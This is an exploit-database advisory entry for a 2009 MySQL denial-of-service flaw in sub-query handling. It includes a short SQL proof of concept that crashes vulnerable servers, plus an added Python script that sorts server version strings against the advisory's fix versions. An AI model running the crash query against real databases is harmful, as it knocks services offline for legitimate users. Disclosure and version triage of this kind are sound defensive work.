MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service

23 Nov 2009 00:00:00 | Reported by Shane Bester | Type: exploitdb | www.exploit-db.com

source: https://www.securityfocus.com/bid/37297/info

MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.

An attacker can exploit these issues to crash the application, denying access to legitimate users.

Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. 

drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select  1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`) <=>
row((select 1 from `t1` where 1=2),(select 1 from `t1`)) 
into @`var0`;
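
The affected-version statement above can be turned into an inventory check. The following is an added example, not part of the original advisory: it classifies `SELECT VERSION()` strings against the fix versions given in the text (5.0.88, 5.1.41) and the 6.0.9 release named in the title. The hostnames, banners and function names are constructed for illustration, and treating branches older than 5.0 as affected is an assumption based on a literal reading of "prior to".

```python
import re

# Fixed patch level per branch, taken from the advisory text above.
FIXED_IN = {(5, 0): 88, (5, 1): 41}
# Release named as affected in the entry title.
NAMED_AFFECTED = {(6, 0, 9)}

_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)")


def parse_version(banner):
    """Return (major, minor, patch) from a VERSION() string, or None."""
    m = _VERSION_RE.match(banner or "")
    return tuple(int(p) for p in m.groups()) if m else None


def classify(banner):
    """Map a server version string to 'affected', 'fixed' or 'unknown'."""
    ver = parse_version(banner)
    if ver is None:
        return "unknown"
    if ver in NAMED_AFFECTED:
        return "affected"
    branch, patch = ver[:2], ver[2]
    if branch in FIXED_IN:
        return "fixed" if patch >= FIXED_IN[branch] else "affected"
    if branch < min(FIXED_IN):
        # Assumption: "prior to 5.0.88" read literally covers older branches.
        return "affected"
    return "unknown"  # the advisory gives no fix version for this branch


def triage(inventory):
    """inventory: iterable of (host, banner); returns {host: status}."""
    return {host: classify(banner) for host, banner in inventory}


# Constructed sample inventory (hostnames and banners are made up).
SAMPLE = [
    ("db-a.example", "5.0.87-community-nt"),
    ("db-b.example", "5.0.88"),
    ("db-c.example", "5.1.40-log"),
    ("db-d.example", "5.1.41-enterprise-gpl-advanced"),
    ("db-e.example", "6.0.9-alpha"),
    ("db-f.example", "5.5.62-0ubuntu0.14.04.1"),
    ("db-g.example", "4.1.22-standard"),
    ("db-h.example", "not-a-version"),
]

if __name__ == "__main__":
    for host, status in triage(SAMPLE).items():
        print(f"{host:14} {status}")
```

Hosts reported as "unknown" are on a branch for which this advisory states no fix version and need to be checked against the vendor's release notes.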

Vulners AI Score: 7.4 (High risk)